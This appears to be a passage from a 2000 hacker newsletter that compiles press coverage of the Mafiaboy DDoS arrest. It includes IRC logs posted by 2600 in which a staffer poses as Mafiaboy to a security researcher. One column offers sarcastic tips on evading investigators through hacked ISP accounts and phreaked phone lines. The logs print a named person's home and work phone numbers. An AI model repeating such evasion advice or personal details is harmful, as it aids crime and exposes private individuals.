enforcement has an adequate number of prosecutors and agents
assigned to the FBI, to the Department of Justice, to other federal
agencies, and to state and local law enforcement trained in the
necessary skills and properly equipped to effectively fight
cybercrime, whether it is hacking, fraud, child porn, or other
forms.
Finally, legal issues are critical. We are finding that both our
substantive laws and procedural tools are not always adequate to
keep pace with the rapid changes in technology.
Are We Supposed To Feel Symapthy For Her?
@HWA
10.6 Mafiaboy:Janet Reno licks chops over Mafiaboy arrest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Posted 20/04/2000 5:11pm by Thomas C. Greene in Washington
Janet Reno licks chops over Mafiaboy arrest
US Attorney General Janet Reno glowed with pleasure during a Wednesday
press conference as she wagged her finger and called for the Canadian
courts to punish Mafiaboy for causing DDoS mayhem on the Web back in
February.
"I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get away
with something like this scot-free," Reno told reporters, as if Mafiaboy
had already been tried and convicted. "There has got to be a remedy, there
has got to be a penalty."
Reno did stop just shy of telling the Canadian courts precisely what the
penalty ought to be. But if Mafiaboy should be convicted, his punishment
will undoubtedly be a good deal lighter than anything a malicious hacker
might get in the USA, which, it was revealed today, has achieved the
distinction of maintining the world's largest polulation of citizens
locked up in cages.
Reno also took the opportunity to boast about the profound technical savvy
of her troops in the field.
"I believe this recent breakthrough demonstrates our capacity to track
down those who would abuse this remarkable new technology, and track them
down wherever they may be," Reno said.
Yeah, right. The Register recalls the very brief period of DoJ
tirumphalism over Coolio's arrest and how quickly it evaporated, and
thinks that this 'recent breakthrough' demonstrates nothing so much as the
Feds' desperate need to pounce on any scapegoat they can find in hopes of
concealing how hopeless they are in tracking cyber-criminals.
The hacking underground remains wisely reluctant to believe that Mafiaboy
is more than a scapegoat, at least until evidence is produced. The scene
has been abuzz with sceptics, while the mainstream press, predictably,
appears satisfied that the Mounties have got their boy.
Meanwhile, 2600.com has posted a bogus IRC log between a staffer posing as
Mafiaboy and one 'Icee' who the magazine claims is the person responsible
for tipping the Feds to Mafiaboy's alleged DDoS attacks.
We're not entirely sure what the point of this stunt is, except perhaps to
demonstrate that anyone can pretend to be anyone else in IRC in hopes of
casting doubt on the authenticity of the Mafiaboy logs which are expected
to be produced in evidence against him at trial.
Nice try, but of course the Feds can obtain both IRC and ISP logs, so it's
not terribly hard for them to divine the true origins of IRC traffic. You
can go on line as 'Icee' and fool, say, the editors of 2600; but if the
Feds can persuade a judge to issue a trap and trace order, they will get
all the evidence needed to pin the logs on the dummy....and probably
figure out how to piece it together, or at least hire someone with a brain
to do it for them.
(Note to wannabe leet h4x0rz: IRC traffic is logged, Einstein, so always
connect through a hacked ISP account or a freebie such as NetZero where
you can register with fictional information; and always dial in from a
phreaked telephone account [preferably in Tonga or Madagascar]. If you
can't manage that much, then don't say anything in IRC that you wouldn't
announce over a bull horn in the lobby of FBI Headquarters.)
Speaking in conclusion, again as if Mafiaboy had been tried and convicted,
Reno lectured the populace on morality. "We have got to renew our efforts
to teach young people -- children -- cyber-ethics," she said.
Renew them? We were blissfully unaware that any such efforts had been
made in the first place. ®
@HWA
10.7 Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IS MAFIABOY REAL OR A CREATION OF THE MEDIA? 04/20/00
We'd like to officially express our skepticism on the recent arrest of a
Montreal teenager for the Denial of Service attacks back in February.
Naturally, we always have reason to be somewhat doubtful whenever the
authorities claim to know the first thing about the Internet. But in this
case, we wanted to see just how clueless they could possibly be. When the
name "mafiaboy" was first mentioned months ago, a couple of us hopped onto
IRC using that nick. Sure enough, within seconds, we were being messaged
by people who believed we were the person responsible. Amazingly, the
person who fell for it the hardest is the very person now being quoted
widely in the media as having caught the perpetrator. Now perhaps this is
all just a big coincidence. But as you can see from the IRC logs below, we
dropped a few clues that the person was in a country with snow and at one
point "accidentally" spoke French to imply the province of Quebec. We were
amazed when the blame actually landed on someone from Montreal.
A good question to ask is why we would want to cause such confusion and
mayhem. The answer is to prove a point. That all one needs to do to be
considered a suspect is change a nickname on IRC. We had absolutely NO
proof that we could provide to make this fictitious person responsible
in any way for the attacks. Yet we were believed by countless people,
including the "expert" who is taking credit for the arrest. And now we
see that the main piece of evidence against the real person who was
arrested is the fact that he was "bragging" in an IRC channel. Please.
If this is indeed the person responsible (and what a geographical
coincidence THAT would be), we'd like to see them held accountable to a
REASONABLE degree. But in order to do this fairly, the evidence must be
made public. Otherwise, we will continue to believe that the authorities
and the media are more interested in sending a message than actually
achieving justice.
-----------------------------------------------------------------------------
[We begin the log after a brief conversation explaining why and how we
are on IRC from a different address.]
READ THE LOGS CAREFULLY ALL MAY NOT BE AS IT SEEMS, IE:NO SPEED READING :-)
-----------------------------------------------------------------------------
*icee* is the "security expert" who first pointed the finger at someone
named mafiaboy, based solely on conversations he had on IRC.
*** [mafiaboy] is 2600 staff posing as someone on IRC named mafiaboy, shortly
after his name was first reported in the news.
(Uh yeah ok ... does 2600 staff do this sort of thing often? hrm ... - Ed)
February 10, 2000 1:07:35 AM
[mafiaboy] if they are looking for this person, they sure as hell would be
*icee* now that is ALL I CAN SAY until i hear more from you
*icee* my docs are this: Michael Lyle, 408-238-3090
*icee* go to a payphone for all the fuck i care
*icee* that way, if you really want, you can take the communications out of
band.
*icee* But before i can talk to you, i need that piece of information.
[mafiaboy] one question
*icee* sure.
[mafiaboy] if you have this info. who have you told?
*icee* I can't tell you that, until you tell me the other piece
*icee* but i told no one anything that wasn't already out there.
[mafiaboy] well no one was fucking msging me an hour ago
*icee* look, i'm neither your friend nor your enemy.. i'm an interested
party
[mafiaboy] brb
*icee* I'm much closer to a friend than your enemy, though.
[mafiaboy] ok
[mafiaboy] since we need to build some trust here
[mafiaboy] let's cover some things that don't involve disclosing anything
non-public
*icee* okay.
[mafiaboy] i need to know why people just started msging me.
*icee* because information about you was disclosed about you on a news
broadcaast by my company.
[mafiaboy] you work for a news agency?
*icee* i can't tell you where that information was obtained until I build
some trust with you
*icee* no, i work for a computer security firm.
*icee* Please don't wig out at that
[mafiaboy] so is that your interest in this?
*icee* Not really.
*icee* Pieces of it.
*icee* If i can benefit myself without hurting you, i'll take advantage
of it.
*icee* But um, i've been in a situation similar to yours before
[mafiaboy] so then, why did you go to the media if no one knew yet?
*icee* i can't really talk about that until we build more trust
*icee* because everyone already knew-- just no one had broken the story
hurt you
[mafiaboy] whois everyone?
*icee* fuck.
*icee* look, i need to know more from you
*icee* before i can go into this.
[mafiaboy] well wtf
*icee* and i need to be on a secure mode of communication
[mafiaboy] "everyone" USUALLY includes the media!
*icee* i need to be assured you're not calling into a dirty provider
*icee* or you need to call me or something
*icee* and you need to provide me with that secret
*icee* so i know i'm talking to you
*icee* here's why:
*icee* i'm not doing anything illegal
*icee* but the information that i would give you
*icee* has no value
*icee* if other people get it.
*icee* if not, it stops here: I suggest you talk to a lawyer, and I wish
you honestly the best of luck.
[mafiaboy] so let me get this straight
[mafiaboy] 3 days, this is one of the top international news stories.
everyone wants to know who is responsible. the fbi and the
president make speeches saying they are clueless. You say
"everyone knows" and you fucking tell the media????
[mafiaboy] i mean
*icee* look
[mafiaboy] i'mjust trying to make sure i have the full picture
*icee* will you take a valium or something, maybe have a swig of
alcohol or three..
[mafiaboy] not that it's me or anything
*icee* and just realize the truth here: I'm trying to be your friend.
*icee* doesn't put you in any more danger
*icee* if i was a fed, and i didn't know who you are
[mafiaboy] i think perhaps you should take a step back and think about
this from my end
*icee* by now, someone would have installed logging access lists and
figured out your ultimate source address
*icee* and coordinated the data from calling records
*icee* and know exactly where you are right now.
*icee* Keeping you in the conversation this long would have been enough
*icee* but that was not my objective.
*icee* nor am i working with the FBI
[mafiaboy] i nver said you were
*icee* so please realize you're giving me nothing more, and get a secure
line of communication with me, and talk to me
[mafiaboy] i know you're not a fed. you're with Recourse Technologies in
sunny palo alto
*icee* I understand it has to be scary as fuck, and i understand i'm not
being easy to work with
*icee* oh, did you listen to our radio stuff up there in Canada, too?
[mafiaboy] you were on the radio too???
*icee* i think they're the only people i talked to who called it sunny
palo alto
*icee* I am not out to get you.
[mafiaboy] who are you fucking Shimomura?
*icee* yes.
*icee* no
*icee* I am not out to get you.
[mafiaboy] we don't even know eachotehr and you're already looking for
your markoff
*** icee has changed the topic on channel #recourse to: *mafiaboy* who
are you fucking Shimomura?
*icee* No I'm not.
*icee* I'm not trying to go down as the person who nailed you
*icee* people already did that
*icee* And i could tell you more about it
*icee* if you'd just fucking talk to me
*icee* but listen to why i can't:
*icee* if you are not the mafiaboy i think
*icee* and i reveal the information
*icee* i've destroyed its utility
*icee* and then i wouldn't have done you much of a favor now, would
i have?
[mafiaboy] if i'm already nailed, how come no raid?
*icee* do you know what flow stats are? logging access lists?
*icee* i can tell you quite clearly how you were nailed
*icee* and i can tell you why there's no raid
*icee* but i NEED INFORMATION
*icee* and the thing is
*icee* I'm willing to help you for two reasons:
[mafiaboy] it's going to be a while before i can get to another means of
communication
*icee* I was in a situation once similar to yours, sort of
*icee* and I'm hoping that if i help you a bit, maybe you'll help me a
little too
*icee* well, are you on sympatico now?
[mafiaboy] no
[mafiaboy] one question though, is it politics?
*icee* Okay, then can we take it to DCC? I consider that safe.
*icee* why you're not?
*icee* yes.
*icee* that'll buy you a couple of days at most.
[mafiaboy] they're capitalizing off it
[mafiaboy] ?
*icee* that and the fact the FBI got a little confused
*icee* it's the fact that it crosses national borders, and there's
difficult procedural problems to solve.
*icee* none of the evidence is in .ca
*icee* or very little of it.
*icee* that and the fact the FBI got a little confused
*icee* it's the fact that it crosses national borders, and there's difficult
procedural problems to solve.
*icee* none of the evidence is in .ca
*icee* or very little of it.
*** DCC CHAT (chat) request from icee[icee@dragon.ender.com
[206.79.254.229:4135]]
*** BitchX: Type /chat to answer or /nochat to close
>>> icee [icee@dragon.ender.com] requested DCC CHAT from mafiaboy
[mafiaboy] won't accept
*icee* okay.
*icee* how do we do this, then?
*** DCC Auto-closing idle dcc CHAT to icee
*icee* I'm willing to do it on your terms, within reason.
*icee* look, i'm just a 20 year old guy, i'm sitting in my computer
room, my girl's sitting here by me, we're eating pizza
[mafiaboy] ok. this whole stalling because of politics thing. is that
your analysis or do you ahve a source on this?
[mafiaboy] (i don';t need your source)
*icee* look
*icee* This is where it stops
*icee* yes i have a source
*icee* i can't say any more.
*icee* until we get out of band somehow.
[mafiaboy] i'm just trying to guage credibility here
*icee* look
*icee* hint: i used to work for exodus communications.
*icee* where is buy.com? where is ebay?
[mafiaboy] hmm
[mafiaboy] is it an official delay? 2600.com is talking about
conspiracy shit
*icee* that's where we're getting to things i don't know , but i don't
buy it's a conspiracy in my personal opinion to be honest
*icee* 2600 isn't worth the paper it's printed on
[mafiaboy] that # you gave me, where is it?
*icee* San Jose, CA.
*icee* It's my main home phone number.
*icee* I'm trusting you.
[mafiaboy] k, landline?
*icee* yes.
*icee* it'll be answered on a cordless phone if that's okay
*icee* i doubt the feds are outside my house.
*icee* And if so, they could just bug the actual line ;P
[mafiaboy] 900mhz?
*icee* or use LMOS and make it easy
*icee* 2.4GHz spread spectrum (CDMA)
[mafiaboy] k, call you from prison ;)
End log
(Remember, if you don't have any real news or real logs, just make up
your own! - Ed)
---------------------------------------------------------------------------
IRC log started Thu Feb 10 19:23
*** Value of LOG set to ON
*** mafia_boy has joined channel #recourse
*** Users on #recourse: mafia_boy Telastyn meesh ssorkin @rross icee
*** #recourse 949885504
*** mafia_boy has left channel #recourse
*** No target, neither channel nor query
*** You have been marked as being away
*** Signoff by mafiaboy detected
*icee* is that you?
[mafiaboy] no THIS is me
*icee* yah?
*icee* so what's up?
[mafiaboy] watching cnn, haha
*icee* yah?
*icee* so did you see me?
[mafiaboy] no, just started
*icee* Look, here's the deal. ssh to some account somewhere that they didn't
know about, or something, so we have a secure channel, so we can talk.
[mafiaboy] why
[mafiaboy] they dont know about this one, not yet anyway
*icee* okay, then let's take it out of band, in DCC.
*** DCC CHAT (chat) request received from icee
*** DCC CHAT connection with icee[206.79.254.229] established
=icee= okay. we talked last night, right?
[mafiaboy] yep
=icee= (i'm asking because with the circumstance, there's fair odds someone
might message me and pretend to be you)
=icee= okay, we need to solve this trust problem, and prove you are who you
say you are.. so the name of the channel.. it starts with a m. can
you tell me it?
=icee= #bifemunix is a rival.
[mafiaboy] 3090
[mafiaboy] good enough?
=icee= okay, that's good enough, but i don't know if that was the
brightest thing to say when we could be possibly listened to
=icee= Okay:
=icee= here's the deal:
=icee= the authorities have a large amount of information which has
been salvaged from machines taken into evidence, as well as:
=icee= flow statistics on routers
=icee= routers keep information on all layer 4 connections for the
purpose of ensuring quality of service
=icee= because the information is kept in the router for a length of
time, it serves as a pretty accurate way to see what host has
talked to what other host recently
=icee= sprint, mci, abovenet, and exds all worked together and put
the flow information together
=icee= they were also able to correlate information from a number
of different sources, like logging access lists on routers
=icee= From teh RUMORS i'm hearing, the only thing keeping you out of
jail at the moment is geopolitical issues, and the fact that
they don't think you're behind all of the attacks
=icee= I think the general idea is, they're going to swoop in, get
you in custody, and then when you can't talk to anyone else
or do anything else, completely fuck you over
=icee= So I have a couple of different recommendations, depending
on what road you want to take
=icee= 1) get a lawyer, surrender to custody, try to plea bargain
=icee= or 2) publically make a statement
=icee= because if you don't do something now, your ability to talk
to the rest of the world is going to be limited
=icee= if it looks like you didn't know what the fuck you were
doing, things can turn out a lot better
=icee= and I have some information, that i certainly can't say over
the phone, that could be of great value to your defense
attorneys
[mafiaboy] and whats in it for you
=icee= What is in it for me?
=icee= You pick option #1, nothing
=icee= You pick option #2, I'd like to be the person who leads you forward.
=icee= But that's also up to you
[mafiaboy] and then you write a book
=icee= I don't want to write a book
=icee= i want to sell software
[mafiaboy] i have sme software here
=icee= what's that mean?
=icee= recourse technologies is a softawre company
[mafiaboy] haha
=icee= The other thing is: i might be able to be a witness in your favor
=icee= and I could certainly help in substantiating you didn't launch all
of the attacks
=icee= I only know for certain you nailed CNN.
[mafiaboy] but you dont really
=icee= okay, here's the things i know
=icee= i know a sympatico ip, and a time; i know everyone says you did
it; and i know you use sympatico.ca
=icee= or used.
=icee= the second set of facts help me more than the FBI; but the first
is enough for them to nail you.. see?
=icee= btw, don't call me now, i'm not at home.
=icee= of course, you could call me at work, 650-565-8601 ext 107
=icee= let me tell you my personal opinions: i think denial of service
is lame as fuck
=icee= and i don't think what you did was particularly cool
=icee= i think you probably didn't realize the implications though, either
[mafiaboy] i gotta smoke and walk around a while
=icee= *nods*
=icee= Just look:
=icee= if you think carefully, and don't freak out
=icee= you can get community service, and end up picking up trash or something
=icee= for 300 hours.. not fun, but better than spending time in juvvie
[mafiaboy] oui
[mafiaboy] ack
[mafiaboy] misfire
=icee= re
=icee= so, any clue what you're going to do?
[mafiaboy] no, i was just talking to a friend on the payphone
=icee= bleh, not talking to me anymore?
[mafiaboy] i dont think i'm in any danger here
=icee= um, why not?
[mafiaboy] many reasons
=icee= Look:
=icee= i don't know if you've heard of me or not
=icee= but at one time i was considered the very, very best
=icee= and i don't possibly understand how you could consider your position
safe.
[mafiaboy] why arent you best any more
=icee= you have lots of people who are willing to rat on you who saw
you demonstrating your might, there's definite information which
ties you to a dialup address.. and i don't see what diversion you
could have done through the phone system to adequetely protect
yourself
=icee= I'm best in something different, now.
=icee= I do mathematics and analyze networks.
=icee= I broke in to things to find out about computers and learn
=icee= once i got legitimate access to them, there wasn't a lot of
reason to do it anymore
=icee= and besides: computer security is a much tougher problem than
breaking something to take it down or break in
[mafiaboy] you still know ppl in the scene??
=icee= I know a lot of people
=icee= but to be honest:
=icee= the scene is very lame
=icee= 99.9999% today have never written exploit code
=icee= i come from a different time, and a different ethic
=icee= what we were doing used to stand for something
=icee= now it's just not the same anymore.
[mafiaboy] dont know much bout thepast
=icee= well, i'd like to tell you about it, sometime.
=icee= see, i'm sure you've read some shit by the mentor, right?
[mafiaboy] but you sound like a friend of mine
=icee= i knew the mentor, even hear from him time to time
=icee= his name came from the fact that he took an active part in taking
people new to the scene, who showed promise, and showed them how
to move forward and what to learn
=icee= i kinda have had that role in the past
=icee= a lot of people who you probably know now have learnt from me
=icee= Basically, I've never wanted attention or anything
=icee= the only reason i'm on TV now, is the fact that I have 20 people
whose livelihoods depend on the fact they've trusted me
=icee= and what is good for my company is good for them
=icee= to be honest i was terrified to death of it and wanted to go
home after the second radio interview
=icee= here's the deal though:
=icee= i'm your friend, and i'm available to provide you with information
=icee= but, these are the conditions:
=icee= I am not going to do anything that incriminates myself
=icee= and if i get subpoenaed i will cooperate, so you want to limit that
which you say to me
=icee= and if there's something you can do in the future that benefits
me, without hurting you, i'd like you to please consider it.
=icee= if you want to come forward, and get your situation known to
the public...
=icee= then i would like to facilitate that.
=icee= but it's jsut if you choose that road.
[mafiaboy] see
[mafiaboy] i dont know you
=icee= *nods*
=icee= and there's one last thing:
=icee= i have a piece of information which is extremely valuable in
your defense
=icee= regarding the handling of the case, and a crucial mistake
which was made
=icee= Look, you've gained favor among a little crowd, but be honest
with me, you know that almost anyone could install the tools
that you did
=icee= I could show any 12 year old who could read how to in an hour
=icee= run exploit, compile, install program, put in startup scripts
.. rinse, repeat, whatever
[mafiaboy] yes but nobody did it
=icee= but WHY do it?
[mafiaboy] snowday
[mafiaboy] haha
=icee= right now they're blaming a 500 point drop in the Dow on you;
saying you had tens of millions of dollars of economic impact
=icee= you think they're not going to put the pieces together?
=icee= there's an infinite set of different kinds of information
which can be used to nail you; forensic data on the
machines you compromised (deleted files; residues in
kernel memory if the machine was taken down), there's
residues of the information in the routers; in SNMP
audit logs in hp openview
[mafiaboy] maybe people will invest in something else and the dow
will go back up?
=icee= RADIUS logs
[mafiaboy] but nobody will give credit for that
=icee= Hey, you and I both know nothing has changed; the Dow
ounced backed today, people will re-invest in ecommerece,
it won't really change anythying
=icee= but the fact is: Janet Reno has put her career on teh
line saying they'll catch you
=icee= and the entire FBI reports to her
=icee= and like, i don't know if you did etrade or datek, but
if you did either of those, you're likely to be
particularly fucked.
[mafiaboy] no comments
[mafiaboy] ;]
=icee= well, obviously: i don't want to know.
=icee= But i can tell you this: you're definitely fucked on CNN.
[mafiaboy] you mean aol?
=icee= well, BBN
=icee= did you just mean to take down AOL, and nailed CNN, too?
[mafiaboy] see above no comments
=icee= heh
=icee= that's a bummer
<end>
<ROFL -ed>
@HWA
10.8 Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Posted 19/04/2000 6:05pm by Thomas C. Greene in Washington
Canadian Feds charge Mafiaboy in DDoS attacks
Canadian authorities have charged a fifteen-year-old boy with
two counts of "mischief to data" for taking part in the distributed
denial of service (DDoS) attacks which shut down popular Web sites
such as Yahoo!, eBay, CNN and Amazon in February, and which finally
brought a healthy scepticism of Internet security into the mainstream
consciousness.
Royal Canadian Mounted Police Inspector Yves Roussel said they were
tipped off when the lad boasted in Internet chat rooms about what he
had done. Police obtained a warrant and searched his Montreal home,
seizing computers and software and placing the lad under arrest on 15
April, he said.
Mafiaboy appeared before a Montreal Youth Court judge on Monday and
was released, but with strict conditions.
"Considering the seriousness of the charges, and consequences derived
from the alleged actions, and in order to prevent further attacks, bail
conditions were imposed. Hence, Mafiaboy is prohibited from the use of
a computer except at school for academic reasons; and he must be under
the direct and constant supervision of a teacher or another [adult]
supervisor," Roussel said during a Wednesday press conference.
"They liked to show off that they were good at it, and that, you know,
they are the best; but it is our evaluation that Mafia boy is not that
good, actually. He had a good knowledge of computers; however, he
wasn't what we could call a genius," Roussel added.
The on-going investigation is a joint operation of the RCMP's Computer
Investigation Unit, the FBI and US Department of Justice. More arrests
could be made, Roussel indicated, but offered no further details.
"Wherever they are, [malicious] hackers will be investigated and
arrested," he warned. ®
@HWA
10.9 Mafiaboy:Canadian Teen Charged in Web Blitz
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Canadian Teen Charged in Web Blitz
_ Some of the Hacked Sites _
Excite: Response times slowed for about an hour and many people were
unable to get through.
E-Trade: Sporadic morning outages for a day.
ZDNet: Offline for several hours one day.
CNN: Certain areas of the site stalled for nearly two hours.
MSN: Only some customers experienced problems over a two-day period.
Amazon: Increased traffic slowed the site.
eBay: Down for most of a day.
Buy.com: Jammed for several hours.
Yahoo: Down for three hours.
Source: Staff and Wire Reports
Anatomy of the Attacks
By David A. Vise and Ariana Eunjung Cha
Washington Post Staff Writers
Thursday, April 20, 2000; Page A01
A 15-year-old Canadian computer whiz known online as "Mafiaboy"
yesterday became the first person to be charged with carrying out one
of the cyber-attacks in February that disabled a string of the Web's
most high-profile sites.
Law enforcement officials said the youth, a Montreal resident, was
arrested on the basis of evidence linking him to the attack on
CNN.com, which involved flooding the site with so many requests for
information that legitimate users were effectively locked out. The
officials said they are still investigating his potential involvement
in other strikes.
U.S. and Canadian agents working on the case declined to comment on
the probability of other arrests, but computer experts who have
worked closely with them say Mafiaboy is likely a copycat because the
assault program he used was so different from the ones used to
cripple Yahoo, the first site to go down, and several others.
The Royal Canadian Mounted Police (RCMP) arrested the youth at his
home on Saturday, seizing all his computers. He was charged with two
counts of "mischief" against the CNN site before being released to
the custody of his parents, pending trial in Montreal youth court.
Because of the suspect's age, his name and address cannot be released
under Canadian law.
The attacks, which took place Feb. 7 through 14 and also affected
Buy.com, eBay, Amazon.com and E-Trade, shut users from around the
world out of the news and trading systems they are beginning to
depend on, cost corporations millions of dollars, and showcased the
vulnerabilities of the Internet. The events caused many to question
the security of the vast World Wide Web, although no personal
financial information was compromised.
Mafiaboy could receive a maximum of two years in a juvenile detention
facility and have to pay a fine of about $680, RCMP Inspector Yves
Roussel said. But Roussel said it would be unusual for the youth to
get jail time: "Even with adults, it's rarely done that a court will
impose imprisonment for this crime."
As a condition of his release, Canadian police and U.S. Justice
Department officials said the young man is prohibited from using the
Internet, visiting stores or businesses that have computers, using
computers in an unsupervised setting, and associating with three
close friends. He is permitted to use a computer at school for
academic work, provided teachers watch his every move. He also has a
curfew, requiring him to be at home from 8 p.m. until 7 a.m. every
day.
Investigators are looking into the possibility that other hackers may
have been working with Mafiaboy. Roussel said that investigators
still had "tons" of evidence seized at Mafiaboy's house to evaluate
and that others may be charged later. Joel De La Garza, a consultant
with Palo Alto, Calif.-based security firm Securify Inc. who has been
tracking Mafiaboy for about a year, said that before the attacks on
CNN, Mafiaboy openly asked for and received technical assistance from
several other people in an online chat room so that he could break
into computers he hoped to use as launch pads for his attacks.
Mafiaboy was part of a group of youths who spent hours on a
password-protected chat channel called TNT on the Internet's original
discussion network, EFNet, which is part of Internet Relay Chat
(IRC). His group was a bunch of "script kiddies," a derisive term
used for people who use cookie-cutter hacker attack tools readily
available on the Web and don't have the skills to create their own,
De La Garza said.
Indeed, Mafiaboy and some of his friends were known to regularly take
down some of the EFNet servers using the same type of strategy that
was employed against Yahoo and the other popular sites.
"It doesn't take someone with a computer science degree or a vast
amount of technical sophistication," said Mike Vatis, head of the
FBI's National Infrastructure Protection Center, "but it does take a
concerted effort and detailed plan to break in these sites and plant
your code and deploy it."
The name Mafiaboy arose early in the FBI's investigation. Most of the
early evidence linking the alias to the attacks was based on logs of
online chats provided by private security experts at Securify,
Recourse Technologies Inc. and others. But connecting Mafiaboy to a
person and address was confusing because many people use that
moniker.
Vatis said the FBI's Atlanta and Los Angeles offices helped determine
by Feb. 12, or about five days after the computer attacks began, that
some of the strikes were coming from a telephone line in Montreal.
Two days later the FBI contacted the Canadian police. It took the
RCMP one day to identify where Mafiaboy lives, but it then took weeks
to determine who in the house was responsible for the attacks.
Early on, federal officials, private individuals and curious computer
wonks began trolling the IRC networks, popular haunts for hackers,
hoping that the culprits would brag about their achievements. Dozens
of hackers and hacker wanna-bes did claim credit for the attacks.
But Michael Lyle of security firm Recourse in Palo Alto said one
person, Mafiaboy, stood out. Lyle said he and other people from his
company engaged Mafiaboy in several online conversations. Mafiaboy
claimed to have attacked CNN.com and E-Trade, among other sites.
Those two sites went down within five to 10 minutes after Mafiaboy
announced that he would cripple them, Lyle said.
Lyle described Mafiaboy as naive: "I don't think he understood the
scope of his actions or the effects on other people. I think it was
him saying, 'Boy, wouldn't it be cool to take down sites?' "
The discovery of an attack program planted on a research computer at
the University of California at Santa Barbara the week after the
assaults began turned out to be a pivotal break in the case,
according to people familiar with the investigation.
In a typical "distributed denial of service" strike, such as the one
that disabled CNN.com, attackers first break into multiple computer
systems and plant malicious programs they activate remotely. The
"zombie" machines act in concert, flooding a target site with
requests for information, shutting out real users.
The UC-Santa Barbara computer is among the dozens to hundreds thought
to have been used in the recent attacks.
Kevin Schmidt, a network programmer on the campus, found some extra
data packets leaving the school's computer system and traced them
back to a hacked machine that was attacking CNN.com. He said the work
was "sloppy" and left an obvious trail, which he was able to trace
back to a handful of computers in the United States and Canada.
FBI Director Louis J. Freeh called the arrest of Mafiaboy a milestone
in global law enforcement efforts to battle cyber-crime. "This and
other recent cyber-crime successes demonstrate the strengths to be
drawn from an international law enforcement-private sector
partnership," he said. Among the agencies involved in the
investigation was the National Aeronautics and Space Administration,
which has often has been the target of hacker attacks.
But some facts indicate at least one other party likely was involved
in the February attacks.
The software programs launched against Yahoo and eBay--the first
high-profile sites to be hit--were radically different from those
that hit CNN and E-Trade later in the week, according to security
experts.
The first were significantly more powerful than the latter programs,
according to people who have analyzed them, and who believe it makes
little sense for the attacker to have switched to an inferior strike
method.
"That's like saying I'm going to get into a fight and I'm going to
trade my Uzi in for a stick," said Securify's De La Garza, who along
with Stanford University computer administrator David Brumley has
been assisting the FBI.
Correspondent Steven Pearlstein in Toronto contributed to this report.
© 2000 The Washington Post Company
@HWA
11.0 Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.washingtonpost.com/wp-dyn/articles/A46086-2000Apr19.html
Canada Arrests 'Mafiaboy' Hacker, Aged 15
Reuters Apr 19 2000 7:49PM ET
MONTREAL (Reuters) - A 15-year-old hacker, known online as
''Mafiaboy'', was charged by Canadian police on Wednesday with
mischief in one of the biggest cyber attacks in history.
The charges relate to the jamming of the CNN.com (TWX.N) Web
site and up to 1,200 CNN-hosted sites for four hours on February 8.
Mafiaboy, who cannot be named under a Canadian law that protects
the identities of juveniles charged with crimes, was arrested on
Saturday and formally charged on Monday, the Royal Canadian
Mounted Police told a news conference.
Police Inspector Yves Roussel said investigators were able to track
the 15-year-old boy in part because he bragged about his alleged
exploit in messages sent to Internet chat rooms.
``This individual, using the nickname Mafiaboy, would have publicized
on many occasions that he was the person responsible for those
attacks,'' Roussel said.
``The prosecution intends to demonstrate before the court that
Mafiaboy is responsible for the denial-of-service attack that was
launched for more than four hours on the 8th of February against the
CNN site and all the sites that are hosted by this company -- and
we're talking roughly 1,200 of those,'' Roussel said.
The Mounties charged Mafiaboy with two counts of mischief to data,
which carries a maximum sentence for juveniles up to two years in
detention and a C$1,000 ($675) fine.
Mafiaboy has been released but his bail conditions include not using a
computer except for academic purposes and under the supervision of
a teacher.
He is also prohibited from connecting to the Internet or frequenting
stores that sell computers or computer paraphernalia. Police seized all
of the computers and related material found at the boy's home.
Police said the investigation into the series of cyber attacks that
locked up some of the Internet's most popular Web sites in February
continues and there could be other arrests.
The ``denial-of-service'' attacks in early February shut down such
Web sites as Yahoo! (YHOO.O), Amazon.com (AMZN.O), eBay
(EBAY.O) BUY.COM (BUYX.O), Excite (ATHM.O) and E-Trade
(EGRP.O).
Mafiaboy was not charged in connection with the attacks against
those sites. The Mounties and FBI declined to say whether they had
identified other suspects in the wider investigation involving those
sites.
``We had to do something to prevent further actions from Mafiaboy.
That's why we arrested him last weekend,'' Roussel said.
``However, the investigation is ongoing and there is literally tons of
information to scrutinize. There is a possibility that other people might
be arrested,'' he added.
Police would not comment on whether Mafiaboy acted alone in the
Web assault on CNN's site or was part of a group. They also would
not divulge how many computers he may have used.
In Washington, U.S. Attorney General Janet Reno said on
Wednesday that Mafiaboy must face punishment.
``I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get
away with something like this scot-free,'' Reno told reporters on
Capitol Hill. ``There has got to be a remedy, there has got to be a
penalty.''
Reno said the U.S. government continued to work with industry on
that incident and others, now that law enforcement has shown it can
crack cyber-attack cases.
``I believe this recent breakthrough demonstrates our capacity to
track down those who would abuse this remarkable new technology,
and track them down wherever they may be,'' she said.
In the February Web site assaults, attackers meticulously obtained
remote control of computers around the world. They then used the
computers to bombard the targeted Web sites, flooding them with so
much data that legitimate users were temporarily denied access or
service.
Police refused to provide any details that would identify Mafiaboy, or
comment on speculation that he attends a suburban Montreal high
school. The Mounties' Inspector Roussel downplayed Mafiaboy's
computing hacking abilities, saying he likely did not have to devise any
special programs to gain access to targeted computers.
``It is our evaluation that Mafiaboy was not that good, actually. He
had a good knowledge of computers, however, he was not what we
could call a genius in that field,'' Roussel said. William Lynn, an FBI
agent who is assistant legal attache at the U.S. Embassy in Ottawa,
said investigators were not surprised to discover that Mafiaboy was a
juvenile.
``In our profiling of these types of matters it is common for us to
consider this as a possibility,'' he told reporters.
The Mounties said their investigation included their Computer
Investigation and Support Unit in Montreal, a division of the FBI, the
U.S. Justice Department and the U.S. National Infrastructure
Protection Center. Canadian police joined the hunt for the hackers in
mid-February as investigators suspected that a Canadian server had
been used in the assault.
The February attacks alarmed Internet users across the globe, cost
Web sites millions of dollars in revenue and shook the electronic
commerce industry because of the apparent ease with which major
sites were made inaccessible.
ABC's television news division said on Tuesday that investigators
were allegedly able to trace the attacks to Mafiaboy by examining the
log files of a computer at a University of California, Santa Barbara,
